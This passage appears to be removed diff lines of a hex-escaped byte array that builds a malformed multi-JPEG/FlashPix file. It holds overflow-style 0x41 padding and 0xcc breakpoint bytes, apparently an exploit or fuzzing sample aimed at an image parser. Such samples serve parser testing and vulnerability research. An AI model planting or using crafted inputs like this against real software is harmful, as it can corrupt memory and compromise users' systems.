-"\xf4\xda\xbe\x9e\xe7\xf0\xa6\x95\xc9\x6d\x2d\x05\xb9\xbe\x48\x65"
-"\xf2\x21\x46\xb8\xb9\x23\x22\x14\x3d\x07\xab\x1e\x8a\x3e\xbf\x86"
-"\x6a\x69\x6d\xe1\x9d\xa3\x69\xa2\x57\x68\x8e\xe4\xdc\x33\xb4\xfa"
-"\xd3\xc2\xaa\xb3\x32\xa8\x05\xb9\x62\x07\x27\xeb\x4b\x45\xfb\x05"
-"\xbb\x85\x14\x51\x48\xa0\xa8\xae\xa6\x68\x22\xdc\x90\xc9\x33\x93"
-"\x85\x48\xc7\x53\xee\x7a\x01\xee\x6a\x5a\x29\xa1\x32\x0b\x45\xba"
-"\x08\xcd\x78\xe8\x5d\x8e\x42\x46\x3e\x58\xc7\xa6\x7a\x9f\xad\x4f"
-"\x45\x9c\x45\xde\x77\x90\x4c\x06\xfd\xaa\x1c\x8d\xb8\x00\x72\xb8"
-"\xed\xcf\x7f\x4a\xce\x7d\x5e\xd6\x16\xb8\x16\xc9\x71\x78\x56\x4c"
-"\x7c\xcc\x02\xfb\x85\x3e\x82\x94\xe4\xa2\xb9\xa4\xec\x85\x0b\xbd"
-"\x16\xa6\x8d\x15\x90\x9a\xc1\x86\xdd\x40\xb3\xb8\x9d\xd8\xb1\x6d"
-"\xf3\x2e\x53\x9e\x06\x7b\xd3\x97\x55\x54\x22\xdf\xec\xf7\x2f\x1e"
-"\x31\xf6\x86\x95\x77\xfd\x71\xeb\x58\xfd\x62\x8f\xf3\xaf\xbc\xd3"
-"\xd9\xd4\xfe\x56\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01"
-"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02"
-"\x11\x03\x11\x00\x3f\x00\xf4\x7a\x28\xa2\xa4\xb0\xa2\x9a\xf2\x24"
-"\x6a\x1a\x47\x54\x04\x80\x0b\x1c\x72\x7a\x0a\x82\xee\xde\x7b\x86"
-"\x58\xd6\xe0\xc3\x06\x3f\x79\xb3\x89\x1b\xd8\x1e\xc3\xf5\xa6\x91"
-"\x2d\xdb\x62\x5b\x86\x99\x61\x63\x6f\x1a\xc9\x2f\x45\x0e\xdb\x47"
-"\xd4\x9a\x65\xa4\x12\xc4\x19\xa7\xb8\x69\xe5\x7c\x6e\x3d\x14\x7b"
-"\x2a\xf6\x1f\xad\x49\x0c\x51\xc1\x0a\x43\x0a\x04\x8d\x06\x15\x47"
-"\x61\x4f\x24\x2a\x96\x62\x00\x03\x24\x9e\x82\x8b\xf4\x41\x6d\x6e"
-"\xc5\xeb\x58\x17\x9a\x85\xd6\xab\x72\xfa\x76\x88\xc1\x51\x78\xb8"
-"\xbd\xea\xb1\xfb\x2f\xa9\xff\x00\x3e\xf4\xc9\xae\x6e\x7c\x43\x33"
-"\xda\xe9\xce\xd0\x69\xca\x76\xcd\x74\x38\x32\x7a\xaa\x7f\x8f\xf9"
-"\x3b\x76\x76\x90\x58\xda\xa5\xb5\xac\x62\x38\x93\xa0\x1f\xcc\xfa"
-"\x9a\xd6\xca\x9e\xb2\xdf\xb7\x6f\x5f\xf2\x31\xbb\xab\xa4\x76\xef"
-"\xdf\xd3\xfc\xc9\xaa\x25\xb9\x85\xae\x9a\xd9\x64\x56\x99\x17\x73"
-"\x20\xe7\x68\xf7\xf4\xa6\xc7\x22\xde\xd9\x96\x4f\x3a\x25\x90\x10"
-"\xac\x46\xc6\xc7\xf7\x87\x71\xed\x4e\xb6\xb6\x86\xd2\x11\x15\xbc"
-"\x62\x34\xce\x70\x3a\x93\xea\x4f\x73\xee\x6b\x2b\x25\xb9\xb5\xdb"
-"\xdb\x62\x25\xb1\x8c\xdd\xfd\xaa\xe1\xda\x79\x14\x9f\x2f\x7f\xdd"
-"\x88\x7f\xb2\x3d\x7d\xfa\xd5\xaa\x2a\x1b\xcb\xb8\x2c\xad\x5e\xe2"
-"\xea\x41\x1c\x48\x32\x49\xfe\x43\xd4\xd3\xd6\x4e\xc1\x65\x15\x71"
-"\xf3\x4b\x1c\x10\xb4\xb3\x3a\xc7\x1a\x0c\xb3\x31\xc0\x02\xb0\x33"
-"\x73\xe2\x79\x08\x1e\x65\xb6\x8e\xa7\xd3\x0f\x73\x8f\xe4\xbf\xe7"
-"\xe8\xb0\xdb\xdc\xf8\x8e\x55\xba\xd4\x11\xa0\xd3\x14\xee\x86\xd7"
-"\x3c\xcb\xe8\xcf\xed\xed\xfe\x4f\x42\xa0\x2a\x85\x50\x15\x54\x60"
-"\x00\x30\x00\xad\x74\xa5\xfe\x2f\xcb\xfe\x09\x8e\xb5\x77\xf8\x7f"
-"\x3f\xf8\x03\x61\x8a\x38\x21\x48\x61\x45\x90\xeb\x07\xcc\x56\x7b"
-"\x01\x10\x41\x41\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xd7\xf0\xa5"
-"\x09\xc6\xa6\xb1\x69\x97\x25\x28\xee\x86\x51\x49\x1b\x89\x23\x59"
-"\x17\x3b\x58\x06\x19\x18\xe0\xd2\xd5\x08\x28\xa2\x8a\x06\x00\xff"
-"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff"
-"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03"
-"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00"
-"\xef\x74\xcd\x3a\xdb\x4b\xb4\x16\xf6\xab\x81\xd5\x98\xfd\xe7\x3e"
-"\xa4\xd5\xaa\x28\xa4\xdb\x6e\xec\xa4\x94\x55\x90\x53\x64\x90\x45"
-"\x1b\xc8\xdd\x11\x4b\x1f\xc0\x66\x9d\x59\xbe\x24\x9c\x5b\xf8\x7a"
-"\xf6\x4c\xe0\x98\x8a\x0f\xab\x71\xfd\x69\xc6\x3c\xd2\x48\x53\x97"
-"\x2c\x5c\xbb\x10\x78\x45\x18\x68\x11\xcc\xe3\x0f\x71\x23\xca\x7f"
-"\x13\xff\x00\xd6\xad\x9a\xad\xa6\x41\xf6\x5d\x2e\xd6\x0f\xf9\xe7"
-"\x12\xa9\xfa\xe3\x9a\xb3\x4e\xa4\xb9\xa6\xd9\x34\xa3\xcb\x04\x82"
-"\xb0\x75\x1f\xf8\x93\xeb\xf0\xea\x6b\x91\x6b\x77\x88\x6e\xbd\x15"
-"\xbf\x85\xbf\xcf\xf5\xad\xea\x82\xfe\xd2\x2b\xfb\x19\xad\x27\x1f"
-"\x24\xab\x8c\xfa\x1e\xc7\xf0\x34\x53\x92\x8b\xd7\x60\xa9\x17\x25"
-"\xa6\xeb\x62\x7a\x28\xa2\xa0\xd0\x2b\x13\xc5\x27\xcd\x82\xc6\xc8"
-"\x75\xb9\xbb\x45\x23\xfd\x91\xc9\xfe\x95\xb7\x58\x97\xdf\xe9\x1e"
-"\x30\xd3\x61\xed\x6f\x0c\x93\x91\xf5\xe0\x7f\x2a\xd6\x8f\xc5\x7e"
-"\xda\x98\xd6\xf8\x2d\xde\xc8\xdc\x3d\x78\xa4\xa2\x8a\xc8\xd8\x28"
-"\xa2\x8a\x00\x28\xa2\x8a\x00\x2b\x17\x4d\x3e\x7f\x8b\x35\x59\xfb"
-"\x42\x91\xc0\xa7\xf0\xc9\xfe\x55\xb5\xc7\x7e\x95\x89\xe1\x31\xe6"
-"\x58\xdd\x5e\x1e\x4d\xd5\xd4\x92\x67\xdb\x38\x1f\xd6\xb5\x86\x91"
-"\x93\xf9\x7f\x5f\x71\x8c\xf5\x9c\x57\xcf\xfa\xfb\xcd\xba\x28\xa2"
-"\xb2\x36\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x20\xbf\x32\x8d\x3e\xe3"
-"\xec\xea\x5e\x6f\x29\xb6\x28\xea\x5b\x1c\x54\x1a\x15\xab\x59\x68"
-"\x76\x96\xee\xbb\x1d\x23\x05\xd4\xf6\x63\xc9\xfe\x75\x7a\x8a\xae"
-"\x6f\x77\x94\x8e\x5f\x7b\x98\x28\xa2\x8a\x92\xc2\x8a\x28\xa0\x00"
-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
-"\x00\xf4\x7a\x2b\x23\xc3\x77\x92\xcb\x69\x25\x8d\xd9\xff\x00\x4b"
-"\xb1\x6f\x2a\x4c\xff\x00\x10\xfe\x16\xfc\xab\x5e\x89\xc5\xc5\xd9"
-"\x84\x24\xa7\x15\x24\x54\xd4\xf4\xcb\x5d\x52\xdf\xca\xba\x4c\x91"
-"\xca\x48\xbc\x32\x1f\x50\x6b\x2e\x3d\x42\xf3\x43\x91\x6d\xf5\x92"
-"\xd7\x16\x84\xe2\x3b\xe5\x5e\x9e\xce\x3f\xaf\xf3\xad\xfa\x6c\x91"
-"\xa4\xb1\xb4\x72\xa2\xba\x30\xc3\x2b\x0c\x82\x2a\xa3\x3b\x2e\x59"
-"\x6a\xbf\xad\x89\x95\x3b\xbe\x68\xe8\xff\x00\xad\xc5\x47\x59\x11"
-"\x5e\x36\x0e\x8c\x32\x19\x4e\x41\x14\x92\x22\xcb\x1b\x46\xe3\x2a"
-"\xc3\x04\x7b\x56\x03\xd8\xde\xe8\x0e\xd3\xe9\x21\xae\x6c\x09\xdd"
-"\x25\x99\x39\x64\xf5\x28\x7f\xa7\xf3\xad\x7d\x3b\x51\xb5\xd4\xed"
-"\xbc\xfb\x49\x37\x2f\x46\x53\xc3\x21\xf4\x23\xb5\x12\x85\x97\x34"
-"\xc6\x9a\x48\x96\xd9\x01\x17\x57\x12\xec\x59\xc8\x20\xfc\xc5\x3a"
-"\x2f\xb6\x7b\x9a\x5f\xb3\xcf\x2a\x3f\x95\x73\x22\xbc\x6e\x40\xc9"
-"\xe0\xfd\x6a\xf2\x08\xa1\x51\x1a\xe1\x40\xed\x50\xdb\x3a\xab\x4f"
-"\xb9\x80\xcc\x84\x8c\xfd\x05\x3e\x61\x72\xf7\x2c\x64\xb1\x20\xa9"
-"\x03\xd7\xd6\x9b\x20\x64\x88\xf9\x2a\x0b\x76\x06\xa4\xa2\xa0\xd0"
-"\xa1\x14\x57\x0d\x76\x25\x9a\x08\xf8\x3c\x31\x6c\x91\xf4\xf4\xab"
-"\xf4\x52\x12\x00\xc9\x38\x1e\xf4\x01\x5a\xf7\xcf\x2b\xb2\x28\x52"
-"\x44\x60\x77\x06\x35\x2d\xb1\x73\x6e\x86\x44\x11\xb6\x39\x51\xda"
-"\x87\x9d\x47\x0b\xc9\xaa\xf2\x4e\xc7\x8c\xf3\xe8\x28\x0b\x10\x6a"
-"\xee\xeb\x0b\xb4\x64\x83\x91\xca\xd6\x24\x37\x17\x9e\x79\xdd\x23"
-"\x91\xb8\x6d\xc1\x26\xb5\x89\x7b\x86\x21\x1b\x6c\x63\xef\x38\xef"
-"\xec\x3f\xc6\xab\x47\x6e\x57\xca\x9a\x37\x29\xe6\x1c\x67\xa8\x07"
-"\x3c\x64\x57\x3d\x4c\x33\xa9\x35\x2e\x6b\x1a\x46\xb7\x24\x6d\xcb"
-"\x73\xa2\xa6\xb3\xaa\xfd\xe3\x8a\x86\x69\x18\x39\x50\x70\x2a\x1a"
-"\xde\xe4\x58\x99\xae\x0f\xf0\x0f\xc4\xd4\x4c\xc4\xf2\xc7\xf3\xa4"
-"\x3c\x0e\x99\xa8\x5a\x68\x95\xf1\x34\x8a\xa7\xae\xd2\x69\x37\xdc"
-"\x76\x1e\x5f\x20\x90\x70\xa3\xab\x1a\x80\x03\x73\x9c\x65\x61\xee"
-"\x7b\xbf\xff\x00\x5a\x9a\xb2\x25\xdc\xdb\x59\xd4\xa0\x3f\x2a\x03"
-"\x9d\xde\xe6\xae\x0e\x9c\x74\xa6\x9a\xe8\x2b\x5f\x72\x2b\x82\x22"
-"\xb4\x7d\xa3\x00\x2e\x00\x14\x79\x2a\xd6\xa2\x16\xce\x36\xe3\x8e"
-"\xb4\x5c\x23\x49\x18\x55\xee\xc3\x3f\x4c\xd4\xb4\x5f\x40\xb6\xa0"
-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
-"\x40\x00\x00\x00\x37\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
-"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
-"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
-"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
-"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
-"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x2a\x00\x02\x01\x15\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x6e\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00"
-"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
-"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
-"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x6f\x00\x00\x00\x5e\x02\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00"
-"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00"
-"\x30\x00\x30\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x28\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x02\x00\x00\x00\x94\x00\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x4f\x00\x70\x00\x65\x00\x72\x00\x61\x00\x74\x00\x69\x00"
-"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"
-"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x24\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00"
-"\x75\x41\x1a\x97\x7c\xb2\x56\x61\x6d\x6b\x35\xb4\xbb\x56\xe9\xe5"
-"\xb7\xc7\x11\xca\x37\x32\x9f\x66\xea\x47\xd7\x3f\x5a\x94\x5d\x5b"
-"\x9b\xa3\x6b\xe6\xa8\x9c\x0c\xf9\x67\x82\x47\xa8\xf5\xfc\x2a\x5a"
-"\x8a\xe6\xd6\x0b\xb8\xbc\xbb\x98\x96\x45\x1c\x8c\x8e\x41\xf5\x07"
-"\xb1\xfa\x54\xde\xef\x52\xac\xd2\xf7\x4c\x6d\x6c\x1d\x2f\x54\xb7"
-"\xd6\xe3\x07\xca\xe2\x1b\xb0\x3b\xa9\xe8\xdf\x87\xf8\x56\xf0\x20"
-"\x80\x41\x04\x11\x90\x47\x7a\x8e\xe6\x08\xee\xad\xa4\xb7\x9d\x77"
-"\x47\x22\x95\x61\xec\x6b\x27\xc3\x73\xcb\x12\xcf\xa4\x5d\xb6\x67"
-"\xb1\x6d\xaa\xc7\xf8\xe3\x3f\x74\xff\x00\x9f\x6a\xd1\xfb\xf0\xbf"
-"\x55\xf9\x19\xaf\x72\x76\xe8\xff\x00\x33\x6a\x8a\x28\xac\x4d\xc2"
-"\xb2\x35\x1d\x14\xbd\xc9\xd4\x34\xa9\x45\xa5\xf8\xea\x47\xdc\x97"
-"\xd9\x87\xf5\xad\x7a\x2a\xa3\x27\x17\x74\x44\xe0\xa6\xac\xcc\xad"
-"\x33\x5a\x5b\x89\xcd\x8d\xfc\x5f\x63\xd4\x17\xac\x4d\xd1\xfd\xd4"
-"\xf7\xad\x5a\xa7\xa9\xe9\x96\xba\xa5\xbf\x95\x72\xb8\x65\xe5\x24"
-"\x5e\x19\x0f\xa8\x35\x99\x16\xa5\x79\xa2\xca\xb6\xba\xe1\x33\x5b"
-"\xb1\xc4\x57\xca\xbc\x7d\x1c\x76\x3f\xe7\x9a\xd3\x95\x4f\x58\x6f"
-"\xdb\xfc\x8c\xf9\xdd\x3d\x27\xb7\x7f\xf3\x37\xeb\x0f\xc4\x31\xbd"
-"\x95\xc5\xbe\xb9\x6e\xa5\x9a\xdb\xe4\x9d\x47\xf1\xc4\x7f\xc3\xfc"
-"\xf4\xad\xca\x6c\x91\xa4\xb1\x34\x72\x28\x64\x70\x55\x94\xf7\x07"
-"\xa8\xa8\x84\xb9\x65\x72\xea\x43\x9e\x36\x08\xe4\x49\x62\x49\x62"
-"\x60\xc8\xea\x19\x58\x77\x07\xa5\x3a\xb0\xfc\x3c\xef\x63\x75\x71"
-"\xa1\xdc\x31\x2d\x01\xf3\x2d\xd8\xff\x00\x14\x44\xff\x00\x4f\xf3"
-"\xd2\xb7\x28\x9c\x79\x5d\x82\x9c\xf9\xe3\x70\xa2\x8a\x2a\x0d\x02"
-"\x9b\x2c\x51\xcd\x13\x45\x32\x2c\x91\xb8\xc3\x2b\x0c\x82\x29\xd4"
-"\x50\x20\xa2\x8a\x28\x19\x8d\xe2\x4b\x79\x63\x8e\x1d\x5a\xd1\x73"
-"\x73\x62\x77\x11\xfd\xf8\xff\x00\x88\x7f\x9f\x7a\xd5\xb6\xb8\x8e"
-"\xea\xd6\x2b\x88\x0e\xe8\xe5\x50\xca\x7d\x8d\x48\x40\x20\x82\x01"
-"\x07\x82\x0f\x7a\xcb\xd1\x2c\x2e\x34\xc6\xba\xb5\x38\x36\x62\x4d"
-"\xf6\xc7\x3c\x80\x7a\xae\x3d\xab\x5b\xa9\x42\xcf\x74\x63\x67\x19"
-"\xdd\x6c\xff\x00\x33\x52\x8a\x28\xac\x8d\x82\x8a\x28\xb7\x44\x6b"
-"\xe6\x66\xb6\xf9\xd6\x31\x89\xc8\x1d\x09\x3f\x28\x3f\x86\x7f\x1a"
-"\x69\x5c\x4d\xd8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22"
-"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11"
-"\x03\x11\x00\x3f\x00\xf4\x7a\x2a\x29\xda\x68\x61\x06\xde\x11\x39"
-"\x5c\x65\x0b\xed\x24\x7b\x13\xdf\xeb\x4d\xb5\xba\x8e\xe9\x5b\x62"
-"\xc8\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x29\x59\xda\xe3"
-"\xe6\x57\xb1\x3d\x14\x51\x48\xa0\xa2\x8a\x28\x01\x22\x55\x84\x30"
-"\x85\x44\x61\x89\x27\x68\xc6\x49\xef\xf5\xa7\x2c\xd3\x43\x6b\xb4"
-"\x66\xe6\x55\x5e\x0b\x90\xa5\xcf\xb9\x03\x03\xf2\xa4\xa2\x9d\xc5"
-"\x60\xa5\xcd\x35\x59\x5d\x43\x23\x06\x52\x32\x18\x1c\x82\x29\x69"
-"\x0c\xa7\x1c\x57\xb0\x4e\x00\x99\x6e\x6d\xd9\xb9\xf3\x78\x92\x31"
-"\xec\x40\xc3\x0f\xaf\x3e\xf5\x6f\x7a\xf9\x82\x3d\xcb\xbc\x8c\x85"
-"\xcf\x24\x7a\xe2\x96\xa1\xba\xb4\xb7\xbb\x50\x27\x8c\x31\x5f\xba"
-"\xe0\xe1\x97\xdc\x11\xc8\xaa\xbd\xde\xa4\x59\xa5\xa1\x35\x15\x0a"
-"\x87\xb6\xb4\xc6\x66\xba\x64\x1c\x67\x1b\xdb\xf9\x0c\xd2\x5a\xde"
-"\xdb\xdd\x6e\x10\xbf\xce\xbf\x7a\x37\x05\x5d\x7e\xaa\x79\x14\xac"
-"\xf7\x1f\x32\xd9\x93\xd1\x45\x14\x8a\x39\xf6\xb4\xbd\xf0\xf3\x34"
-"\xba\x62\xb5\xde\x9c\x4e\x5e\xd4\x9c\xbc\x7e\xa5\x0f\x7f\xa7\xff"
-"\x00\xae\xb5\xf4\xfb\xfb\x5d\x4a\xd8\x4f\x67\x28\x91\x3b\x8e\xea"
-"\x7d\x08\xed\x56\x6b\x1f\x50\xd1\x5b\xed\x27\x50\xd2\x25\x16\x97"
-"\xbf\xc4\x31\xf2\x4d\xec\xc3\xfa\xd6\xdc\xca\xa7\xc5\xbf\x7f\xf3"
-"\xff\x00\x33\x0e\x59\x53\xf8\x35\x5d\xbf\xcb\xfc\x8d\x8a\x2b\x2f"
-"\x4b\xd6\x52\xee\x63\x67\x79\x11\xb3\xbf\x4f\xbd\x0b\xff\x00\x17"
-"\xba\x9e\xe2\xb5\x2b\x39\x45\xc5\xd9\x9a\xc6\x6a\x6a\xe8\x29\x36"
-"\x29\x90\x48\x55\x77\x81\x80\xd8\xe7\x1e\x99\xa5\xa2\xa4\x65\x39"
-"\xe5\xbe\xb7\x99\x9d\x61\x5b\xab\x73\xfc\x31\xfc\xb2\x27\xe0\x78"
-"\x6f\xd0\xd5\xc1\xcd\x15\x0d\xd5\xac\x77\x51\x85\x90\xba\x95\x3b"
-"\x95\xe3\x72\xac\xa7\xd4\x11\x55\x74\xc5\x66\xb6\x26\xa2\xad\x08"
-"\x21\x59\x9a\x61\x12\x09\x58\x05\x67\xc7\x24\x0e\x83\x35\x95\x3e"
-"\xab\x63\x69\x77\x74\x96\xd6\xc6\x5b\x81\x8f\x30\xc6\xa0\x06\x6f"
-"\x42\xc7\xb8\x15\x32\x71\x8a\xbc\x9d\x90\xd5\xdb\xb2\x43\x75\x4d"
-"\x2a\xd7\x54\x84\x25\xc2\x90\xe9\xcc\x72\xa1\xc3\xa1\xf6\x35\x4e"
-"\xc2\xef\x51\xb2\xbc\x8f\x4e\xd5\x63\x6b\x80\xfc\x43\x79\x1a\xe4"
-"\x37\xb3\xfa\x1f\xf3\xef\x53\x47\xad\xa4\x30\xb3\xc3\xa5\x15\x92"
-"\x47\x2c\xe8\x1d\x46\x4f\xf7\x89\xef\x4a\xba\xd4\x50\x6c\x8a\x0d"
-"\x2c\x88\x9b\x97\xda\xca\x02\x92\x79\xe3\xbd\x4a\xc5\xd2\xb7\x2b"
-"\x92\x6b\xd7\xfa\xff\x00\x82\x4b\xa1\x3b\xf3\x28\xb4\xff\x00\xaf"
-"\xeb\xc8\xd2\xa2\xb3\x23\xd5\xed\xd5\x1e\xd0\x69\x7b\x6d\x42\x95"
-"\x50\x0a\xe1\x87\xa6\xde\xd9\xa6\x9d\x62\x29\x2c\x1a\x09\x34\x8f"
-"\x90\x00\xab\x01\x75\x2a\x56\xa3\xeb\x14\x7f\x9d\x1a\xfb\x3a\x9f"
-"\xca\xcd\x5a\x2b\x32\x6d\x6a\x19\x60\x89\x66\xd2\x9a\x55\x27\x2e"
-"\x99\x43\xb3\x07\x8c\x67\xad\x6d\x6c\xb6\xbb\x48\xe4\xdb\x1c\xaa"
-"\xad\xbd\x1b\x19\xc1\x1d\xc7\xbd\x5c\x27\x09\xfc\x32\xb9\x32\x52"
-"\x8e\xe8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02"
-"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11"
-"\x00\x3f\x00\xf4\xd7\xbc\x86\x28\x96\x49\xdc\x45\x92\x17\x9e\xc4"
-"\xf6\xab\x15\x46\x91\x93\x73\xc6\xfb\x9c\x18\xce\x57\x6b\x10\x3f"
-"\x11\xdf\xf1\xa2\xe3\xb3\x2f\xd5\x6d\x46\xec\x58\xd8\x4d\x72\x50"
-"\xb9\x45\xe1\x41\xc6\xe2\x78\x03\xf3\x22\x9a\x27\x9b\xcf\x5c\x98"
-"\xcc\x5b\x4e\x46\x0e\xec\xf6\xe7\xa6\x29\x27\x36\xf7\xc9\x3d\x95"
-"\xc4\x4f\xe5\xb2\x00\xc5\x86\x03\x03\xe8\x7d\x45\x35\x6b\xea\x4c"
-"\xaf\x6d\x0a\x17\x93\xea\xda\x5d\x93\xdf\xdc\xcf\x05\xca\xa0\xcc"
-"\x90\x24\x5b\x71\x9f\xee\xb6\x79\xc1\xf5\xea\x3d\x2a\x4b\x7d\x42"
-"\xdb\x4c\xb5\x86\xce\xf2\xe2\x49\x6e\xa3\x8c\x34\xdb\x51\xa4\x2a"
-"\x4f\x24\xb6\x01\xc0\xcf\xaf\x6a\x6c\xba\x65\xdd\xc8\x82\x29\x35"
-"\x4f\x3e\xda\x29\x95\xa4\x42\x80\x17\x0b\xce\x18\x8e\xa7\x20\x7a"
-"\x52\x5b\x5c\xae\x95\x71\x79\x1d\xdc\x13\x93\x2c\xed\x2c\x72\x47"
